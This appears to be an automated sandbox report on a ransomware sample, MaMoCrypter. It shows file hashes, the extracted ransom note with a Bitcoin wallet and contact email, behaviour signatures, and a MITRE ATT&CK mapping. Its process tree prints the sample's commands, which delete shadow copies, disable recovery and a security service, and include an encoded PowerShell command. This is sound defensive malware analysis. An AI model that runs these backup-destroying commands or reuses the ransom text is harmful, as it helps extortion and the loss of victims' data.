Overview

overview

10

Static

static

MaMoCrypter.bin.exe

windows7_x64

10

MaMoCrypter.bin.exe

windows10_x64

10

Analysis

  • max time kernel
    138s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    21-07-2020 16:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MaMoCrypter.bin.exe

  • Size

    922KB

  • MD5

    0889138a3894284e97b61f9a310e3e7d

  • SHA1

    6c51969b1b1686abd8220191e12e647ab7312517

  • SHA256

    5063ae08ea15ab78bd9062ca0d0813c0682a22583ecd1830efeb6afcc2dd45d8

  • SHA512

    23317713644609a71953fc632478ee638d818bbb675e4f4ca00226cb4006a631800b3fe35c57aa85078f54155cb5d5c409e37fff25fc8315ee702a30c18f6f18

Score
10/10
ransomwareevasiontrojanpersistence

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\How Do I Recover My Files (Readme).txt

Ransom Note
* What happened to my files? Your important files are encrypted. Many of your documents, photos, videos, databases, and other files are no longer accessible because they are encrypted. Maybe you're busy finding a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service. However, if you want to use the programs of data recovery companies, please do not work on your original files, but make copies of them. Corruption of the actual files can cause irreversible damage to your data. * Can I Recover My Files? Sure. We guarantee that you can recover all your files safely and easily. But for this you need to send $300 worth bitcoins to our address. Even if you give money, Do not believe the people around you who say they will not give your files, I Have Enough Reference To Give You Confidence. I don't know about you, so there is no point in having bad feelings towards you, doing evil to you, my goal is just to earn an income from this business. * What about the guarantees? This is just a job. We never care about you and your deals. If we do not fulfill our work and obligations - no one will cooperate with us. If you do not believe us, tell us any 1 or 2 files with SIMPLE extensions (jpg, xls, doc, etc ... not databases!) And low size (max 1 mb) 1 or 2 file and following special public and private mzrevenge keys produced for you send us we will decrypt these files and send it back to you. This is our guarantee. * How to contact with you? You can write us to our mailbox: mzrdecryptorbuy@firemail.cc Don't forget, check your "Spam" or "Junk" folder it you can't get more than 6 hours of answer. * How will the decryption process proceed after payment? After payment, we will send you our special decoder program by mail, just open it, then it will automatically decrypt all your files. but you need to pay for it and contact us. * So what is Bitcoin and how to get it? The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ If you are ready to pay the money we want, Bitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd These are public and private MZREVENGE decryption keys produced for you. If these keys are damaged, nobody can recovery your files. ============================{ PUBLIC MZREVENGE KEY }============================= MZRKEYPUBLICwr0Uwpc5AcO0FMODw7DCpMKJw6DCp8KxwqbCiUx6wobClMO/RSLDsxV+woc4wrE6ZQPDp8KaHMO1w79Pw7wOIR4OZcOgwq8gwoESc8KYDMKxCWhQwokGw43DgcKSw54ywohnw6XCpMO+w6nCgsK0HMOzKznCnGLCicKvw53Dim9xw4dYwpp4L3dsVBHCpFLDoEDDvMKUw7nCuWVyQMKXwqI0wqVvNgQeJi3DikUcw7zCgXU2wr4mY1nDksOvwqQ5ccK4RcKJb0TDmcOzw7ARwqY9fEvCncKmHWzDr8KsFcOGEkrDgsOXwoBNehHCq8KJw6DDgsKCwosUFjLCqsOubhVWPjHCpMO3XsOKwp7DgcKFwprDrsKAwqEMwrVyw6fDhcO8c2HCmsKpHcOHw69iw4Jqw4fDkCvDhFtewrXDl8OLAsKhw4Fhw6s2ZcOgwosjAX/DsjHDiwHDoMOlwrjCu8KIesK/PRbCn8Klw77Ck8KSJQfDsTnDg8OqRMODZWEyw7wjwow8w7DDpcKPwpNkF20OwrAcZsKWMsK8w49yNMOfa8Kewrg4eMKvwo0zwpdewoI6wpfDlMKkHMK4HWLDhgvCqlzCjcKdwp7CgMO5wo3DtMKjw4QzGcKhwrkva0Idw6soOsOeWMO8Bw== ================================================================================= ============================{ PRIVATE MZREVENGE KEY }============================ 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 =================================================================================
Emails

mzrdecryptorbuy@firemail.cc

Wallets

3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd

Signatures

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • UAC bypass 3 TTPs
    evasiontrojan
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • System policy modification 1 TTPs 17 IoCs
    evasion
  • Loads dropped DLL 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Drops file in Drivers directory 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MaMoCrypter.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\MaMoCrypter.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    PID:1304
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Checks whether UAC is enabled
      • System policy modification
      • Drops file in Drivers directory
      PID:1440
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:360
        • C:\Windows\SysWOW64\sc.exe
          sc config "AppCheck" start=disabled
          4⤵
            PID:1072
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:748
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:1048
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1776
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1500
        • C:\Windows\SysWOW64\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\How Do I Recover My Files (Readme).txt
          3⤵
            PID:1564
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Modifies service
        • Suspicious use of AdjustPrivilegeToken
        PID:1812

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Modify Existing Service

      1
      T1031

      Privilege Escalation

      Bypass User Account Control

      1
      T1088

      Defense Evasion

      Modify Registry

      3
      T1112

      Bypass User Account Control

      1
      T1088

      Disabling Security Tools

      1
      T1089

      File Deletion

      2
      T1107

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\How Do I Recover My Files (Readme).txt
        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        Download Submit
      • \Users\Admin\AppData\Local\Temp\svchost.exe
        Download Submit
      • memory/360-3-0x0000000000000000-mapping.dmp
        Download
      • memory/748-4-0x0000000000000000-mapping.dmp
        Download
      • memory/1048-5-0x0000000000000000-mapping.dmp
        Download
      • memory/1072-6-0x0000000000000000-mapping.dmp
        Download
      • memory/1440-1-0x0000000000000000-mapping.dmp
        Download
      • memory/1500-7-0x0000000000000000-mapping.dmp
        Download
      • memory/1564-11-0x0000000000000000-mapping.dmp
        Download
      • memory/1776-8-0x0000000000000000-mapping.dmp
        Download